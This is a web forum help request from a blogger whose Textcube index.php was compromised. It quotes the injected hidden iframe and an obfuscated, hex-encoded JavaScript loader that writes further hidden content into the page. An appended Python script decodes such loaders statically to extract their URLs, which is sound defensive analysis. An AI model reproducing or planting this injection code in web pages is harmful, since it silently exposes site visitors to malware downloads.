Subject: Malware? What is this?
Hosting: cafe24
TC 1.7.6
Since yesterday, my antivirus has suddenly started detecting malware on my blog (Kaspersky IS)
2008-12-14 오전 11:41:33 탐지: Trojan-Downloader.Win32.Small.ageu Adobe Acrobat 8.1 http://94.247.2.157/.lck/?h=9ac0i?892bd … 0000000170
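While the site is loading, a site called gogo2me.net flashes by, and 94.247.2.157 shows up as well.
When I opened up index.php in the top-level directory, an iframe had been inserted on the very last line. I can't tell whether it was there from the start or not.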
iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l4943ef0c9e224(l4943ef0c9e9f4){ return (parseInt(l4943ef0c9e9f4,16));}function l4943ef0ca093d(l4943ef0ca1107){ var l4943ef0ca1cc1='';l4943ef0ca47bb=String.fromCharCode;for(l4943ef0ca3036=0;l4943ef0ca3036<l4943ef0ca1107.length;l4943ef0ca3036+=2){ l4943ef0ca1cc1+=(l4943ef0ca47bb(c102916999516l4943ef0c9e224(l4943ef0ca1107.substr(l4943ef0ca3036,2))));}return l4943ef0ca1cc1;} var xf0='';var l4943ef0ca4f8e='3C736'+xf0+'3726'+xf0+'970743E6'+xf0+'96'+xf0+'6'+xf0+'28216'+xf0+'D796'+xf0+'96'+xf0+'1297B6'+xf0+'46'+xf0+'F6'+xf0+'3756'+xf0+'D6'+xf0+'56'+xf0+'E742E77726'+xf0+'9746'+xf0+'528756'+xf0+'E6'+xf0+'5736'+xf0+'36'+xf0+'1706'+xf0+'528202725336'+xf0+'32536'+xf0+'392536'+xf0+'36'+xf0+'2537322536'+xf0+'312536'+xf0+'6'+xf0+'42536'+xf0+'352532302536'+xf0+'6'+xf0+'52536'+xf0+'312536'+xf0+'6'+xf0+'42536'+xf0+'3525336'+xf0+'42536'+xf0+'332533312533302532302537332537322536'+xf0+'3325336'+xf0+'42532372536'+xf0+'3825373425373425373025336'+xf0+'125326'+xf0+'6'+xf0+'25326'+xf0+'6'+xf0+'2536'+xf0+'372536'+xf0+'6'+xf0+'6'+xf0+'2536'+xf0+'372536'+xf0+'6'+xf0+'6'+xf0+'2533322536'+xf0+'6'+xf0+'42536'+xf0+'3525326'+xf0+'52536'+xf0+'6'+xf0+'52536'+xf0+'3525373425326'+xf0+'6'+xf0+'25326'+xf0+'52536'+xf0+'372536'+xf0+'6'+xf0+'6'+xf0+'25326'+xf0+'6'+xf0+'2536'+xf0+'332536'+xf0+'382536'+xf0+'352536'+xf0+'332536'+xf0+'6'+xf0+'225326'+xf0+'52536'+xf0+'382537342536'+xf0+'6'+xf0+'42536'+xf0+'6'+xf0+'32532372532302537372536'+xf0+'392536'+xf0+'342537342536'+xf0+'3825336'+xf0+'42533372533312533352532302536'+xf0+'382536'+xf0+'352536'+xf0+'392536'+xf0+'372536'+xf0+'3825373425336'+xf0+'42533312533312533302532302537332537342537392536'+xf0+'6'+xf0+'32536'+xf0+'3525336'+xf0+'4253237253736'+xf0+'2536'+xf0+'392537332536'+xf0+'392536'+xf0+'322536'+xf0+'392536'+xf0+'6'+xf0+'32536'+xf0+'3925373425373925336'+xf0+'12536'+xf0+'382536'+xf0+'392536'+xf0+'342536'+xf0+'342536'+xf0+'352536'+xf0+'6'+xf0+'525323
725336'+xf0+'525336'+xf0+'325326'+xf0+'6'+xf0+'2536'+xf0+'392536'+xf0+'36'+xf0+'2537322536'+xf0+'312536'+xf0+'6'+xf0+'42536'+xf0+'3525336'+xf0+'52729293B7D76'+xf0+'6'+xf0+'172206'+xf0+'D796'+xf0+'96'+xf0+'13D7472756'+xf0+'53B3C2F736'+xf0+'3726'+xf0+'970743E';document.write(l4943ef0ca093d(l4943ef0ca4f8e)); /script
Where should I start dealing with this?
T_T
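Added example, not part of the original post and not Textcube code: a static decoder for the obfuscation style visible in the script above (a hex string split up by the empty variable `xf0`, decoded two digits at a time and handed to `document.write`), so the hidden markup and URLs can be read without running the script in a browser. The function names, the `example.invalid` URL and the sample input are constructed for illustration.

```python
import re
from urllib.parse import unquote

EMPTY_VAR = re.compile(r"var\s+(\w+)\s*=\s*'';")          # filler such as: var xf0='';
HEX_LITERAL = re.compile(r"'((?:[0-9A-Fa-f]{2}){8,})'")   # long, even-length hex string
URL = re.compile(r"https?://[^\s'\"<>]+")


def decode_injected(js):
    """Statically decode hex-string payloads. The script is never evaluated."""
    # Step 1: drop the empty-string filler, so '3C'+xf0+'73' becomes '3C73'.
    for name in EMPTY_VAR.findall(js):
        js = re.sub(r"'\s*\+\s*" + re.escape(name) + r"\s*\+\s*'", "", js)
    decoded = []
    for literal in HEX_LITERAL.findall(js):
        # Step 2: two hex digits per character, as the parseInt(x, 16) loop does.
        text = bytes.fromhex(literal).decode("latin-1")
        # Step 3: peel percent-encoding meant for unescape(), if any is present.
        for _ in range(5):
            peeled = unquote(text, encoding="latin-1")
            if peeled == text:
                break
            text = peeled
        decoded.append(text)
    return decoded


def extract_urls(js):
    """Return the sorted, de-duplicated URLs found in the decoded layers."""
    return sorted({u for t in decode_injected(js) for u in URL.findall(t)})


def build_sample(inner_html):
    """Constructed, harmless sample obfuscated in the same style."""
    pct = "".join("%%%02x" % b for b in inner_html.encode())
    plain = "<script>document.write(unescape('" + pct + "'));</script>"
    chunks = plain.encode().hex().upper().replace("6", "6'+xf0+'")
    return "var xf0='';var p='" + chunks + "';document.write(d(p));"


SAMPLE = build_sample('<iframe src="http://example.invalid/x" width=1 height=1></iframe>')

if __name__ == "__main__":
    for layer in decode_injected(SAMPLE):
        print(layer)
    print(extract_urls(SAMPLE))
```

Feeding the tail of a suspect `index.php` to `extract_urls` gives the hosts to compare against the antivirus log and to search for in the other files on the account.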